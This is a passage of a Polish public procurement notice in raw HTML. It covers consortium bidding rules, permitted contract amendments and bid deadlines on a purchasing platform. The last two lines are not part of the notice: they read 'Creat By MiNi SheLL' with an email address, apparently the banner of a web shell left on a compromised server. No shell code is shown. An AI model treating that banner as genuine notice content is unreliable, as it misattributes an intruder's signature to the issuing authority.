zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunki udziału w postępowaniu określone w pkt 1. powinni spełniać łącznie wszyscy<br/>Wykonawcy.<br/>4. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy;<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>5) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 7 do<br/>SIWZ. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.<br/>2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej<br/>jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich<br/>wprowadzenia.<br/>3. Zmiana terminu realizacji przedmiotu umowy możliwa jest w przypadku:<br/>1.1. Zmiany spowodowane warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót, w szczególności:<br/>a) klęski żywiołowe,<br/>b) utrzymujące się niskie temperatury i pokrywa śnieżna<br/>c) rozmiękczenie gruntu uniemożliwiające poruszanie się sprzętu<br/>1.2. Zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi, w<br/>szczególności:<br/>a) niewypały i niewybuchy,<br/>b) wykopaliska archeologiczne nie przewidywane w SIWZ,<br/>1.3. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w<br/>szczególności:<br/>a) wstrzymanie robót przez Zamawiającego,<br/>b) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej.<br/>1.4. Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące<br/>niemożliwością prowadzenia prac.<br/>1.5. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej termin<br/>wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia<br/>wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych<br/>okoliczności.<br/>2. Zmiana sposobu spełnienia świadczenia<br/>2.1. Zmiany technologiczne, w szczególności:<br/>a) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań<br/>technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby<br/>zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem<br/>projektu,<br/>b) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub<br/>materiałowych ze względu na zmiany obowiązującego prawa.<br/>Zmiany wskazywane w lit b) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie<br/>przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia<br/>wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu<br/>kosztom.<br/>2.2. Zmiany osobowe - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot<br/>umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o<br/>których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie<br/>wymagała również zaakceptowania przez Zamawiającego.<br/>3. Pozostałe zmiany<br/>a. zmiana obowiązującej stawki VAT:<br/>b. rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku<br/>wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający<br/>zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca<br/>poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.<br/>c. Zamawiający dopuszcza wprowadzenie zmiany materiałów urządzeń przedstawionych w<br/>ofercie przetargowej, pod warunkiem że zmiany te będą korzystne dla zamawiającego. Będą to,<br/>przykładowo okoliczności:<br/>- powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatację i<br/>konserwację wykonanego przedmiotu umowy,<br/>-powodujące poprawienie parametrów technicznych<br/>- wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany<br/>obowiązujących przepisów.<br/>Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy https://platformazakupowa.pl/pn/lasy_dabrowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com